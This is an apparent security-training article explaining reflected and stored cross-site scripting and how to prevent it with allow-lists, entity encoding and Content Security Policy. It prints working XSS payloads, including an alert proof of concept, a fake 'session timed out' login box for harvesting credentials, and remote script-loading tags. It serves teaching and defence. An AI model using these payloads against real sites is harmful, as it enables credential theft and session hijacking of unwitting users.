Finding and Fixing Cross-site Scripting (XSS)

Published: 19 October 2020


Cross-site Scripting (XSS) is a vulnerability that occurs where an attacker could cause a scripting language to execute within another user’s view of a web application. There are three types: Reflected, Stored, and DOM-Based. Finding and exploiting DOM-Based XSS is quite different to stored or reflected, so we’ve separated it into its own article: Finding and Fixing DOM-XSS.

Cross-site Scripting occurs where user input is insecurely returned to a user, where scripts such as JavaScript can be executed in that user’s browser. If the payload is contained within the request (such as a GET or POST parameter) and returned within the server response – this is Reflected XSS. If the payload is stored (such as in a database) and returned in a later response, such as when viewing a forum post – this is Stored XSS.

The payloads are generally the same, there difference is simply the method of getting that payload to a target user. For Reflected this is generally achieved by convincing a user to click on a crafted link, for example through a phishing email. Stored can either be achieved by sending a link to the target page to a user, or simple waiting for a user to stumble on to the target page through their normal browsing of the vulnerable site.

How to Find and Exploit XSS

The first step to finding XSS is finding an input on the site where user input is returned to the user. In this example we’ll look at Reflected, but the exploitation of Stored would be near identical just without the requirement for a user to click the crafted link.

On our workshop page, which we use for our security training courses, we have a simple reflection point – if you enter your name in the form it says hello and gives back your name:

The user supplied the word “Nathan!” to the form, and the server returns “Hello Nathan!”

In this example, it’s passed through the URL, making this Reflected XSS. As the URL can be crafted and sent to the target user, as:!

This simple text reflection is not, in itself, a security vulnerability (okay, it is possible to place an offensive or political message within the response but the impact is severely limited). The impact becomes more significant if we can smuggle HTML or JavaScript into the response.

For example, we could replace “Nathan!” with a payload such as:<script>alert()</script>

If a user clicks this link they will receive the following:

The JavaScript is reflected to the page, causing the alert box to display

This causes a JavaScript alert box to open within the browser. Whilst an alert box is not a significant payload it does serve as a safe proof-of-concept for use in penetration-testing/bug-bounty reports, to prove JavaScript execution was possible.

The alert box could easily be replaced with more impactful JavaScript, such as a script to deface the web page content, to steal confidential data from the user’s session, to steal the user’s session token, or to execute an exploit against the user’s browser.

We could, for example, write a script which presents the user with a fake login box which will capture user credentials; for example:<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action=''><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>

This will cause the following output on the vulnerable workshop page:

A fake login box presented as a proof-of-concept, user credentials will be sent to

Whilst this is an effective payload, there are many other options.

Although this example payload would make the link really long – therefore an alternative is to use a src attribute and host the script on a web server the attacker has access to, such as:

<script src=""></script>

Using a payload like this, and hosting the script on a server will allow for a shorter crafted link to be used.<script src=""></script>

Finally, it’s also possible to encode this payload to obfuscate the contents – such as through URI encoding:

How to Fix XSS

As stated in the introduction, this issue comes about where user supplied input is included within server responses without filtration or encoding.

Therefore, one very effective method of preventing this attack is to use an allow-list (sometimes called a whitelist) which will allow only known good content. For example if your expected input is an integer and the user supplies anything other than an integer you can simply reject that input – and perhaps supply a message to inform the user what the issue is, without including the original payload.

The opposite approach to this would be to use a blocklist (sometimes called a blacklist) which attempts to block known-bad content, which requires a complete list of all possible bad inputs and is therefore commonly ineffective, as it opens up the possibility for filter evasion.

However, encoding is often an option – for example in the example case, if output was HTML Entity encoded (Many languages have a built-in function for this, for example PHP has htmlentities()), then the JavaScript execution would be blocked by the browser.

In short this is because required characters such as the less-than and greater-than (< and >) would be replaced with their entity versions, < and >. These entities render correctly in the browser but the browser will not interpret them as tags, thereby blocking access to JavaScript or the ability to craft HTML tags.

It’s also worth considering Content Security Policy (CSP), which is a browser feature that allows you to specify an allow-list of locations where JavaScript (and other resources) can be loaded from – allowing you to block attacks of this nature across a whole site.

Read More